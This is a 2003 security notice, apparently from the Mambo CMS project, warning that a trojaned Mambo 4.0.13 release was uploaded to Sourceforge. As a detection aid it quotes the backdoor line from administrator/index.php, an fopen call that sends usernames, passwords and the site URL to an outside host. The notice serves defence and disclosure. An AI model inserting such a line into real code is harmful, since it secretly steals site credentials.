URGENT :: Sourceforge HACKED!
13 Jul 2003
Anyone that has download Mambo 4.0.13 from Sourceforge or any sister site should be aware that a malicious attacker has hacked into Sourceforge.net and uploaded a version of 4.0.13 that transmits ALL password back to the site : http://www.pmrepuestos.com.To check you have the hacked version please look in the file administrator/index.php at line 53. If you see the following:
$ho = fopen ("http://www.pmrepuestos.com/jol.php?u=$ads&p=$sda&s=$live_site", "r");
Then you are running the version that has been hacked and it should be removed immediately.
We are sorry for the inconvience that one small minded malicious individual has caused and we are making every effort to rectify this. Sourceforge.net has been contacted regarding this matter and we are awaiting their response.